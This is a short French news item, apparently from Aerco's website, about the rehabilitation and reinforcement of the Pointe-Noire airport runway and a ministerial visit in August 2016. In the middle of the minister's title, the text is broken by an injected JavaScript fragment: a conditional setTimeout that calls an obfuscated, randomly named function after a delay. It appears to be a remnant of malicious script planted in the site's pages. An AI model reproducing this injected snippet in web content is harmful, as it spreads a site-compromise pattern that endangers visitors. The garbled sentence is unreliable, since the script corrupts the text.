La piste de pointe-noire fait peau neuve!

Fin août, la piste de Pointe-Noire a fait peau neuve. Après 5 mois de préparation et 7 mois de travaux intensifs, les 2600 mètres sont réhabilités et renforcés. Les travaux ont nécessité la fermeture de la piste la nuit de 22h à 08h afin de permettre leur réalisation. 270 ouvriers ont travaillé de nuit sur la piste ainsi que 80 personnes à la carrière de Nkougni à 100 km de Pointe-Noire pour fournir les matériaux de chaussée nécessaires.

Une piste aux normes internationales

Le 5 août 2016, notre ministre de tutelle, M. Gilbert Mokoki, Ministre du Transport, de l’Aviation Civile et de la Marine Marchandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande a visité le chantier. Il a apprécié le professionnalisme des équipes d’Aerco, d’Egis Avia, de SGE-C et d’INEO qui ont su, sous le contrôle du BCS et de l’ANAC, mener à bien cet important chantier.
Dans le cadre de l’objectif de la certification des Aéroports du Congo et du développement du transport aérien, Aerco a aujourd’hui à Pointe-Noire, une piste aux normes internationales qui, grâce à ses nouvelles caractéristiques (renfort de la chaussée, raquettes de retournement et accotements élargis), pourra accueillir de nouveaux types d’avions que certaines compagnies opèrent.

home-piste
Le seuil 17, raquette élargie et marquage refait

home-piste-2
La base industrielle du chantier pour la fabrication des enrobés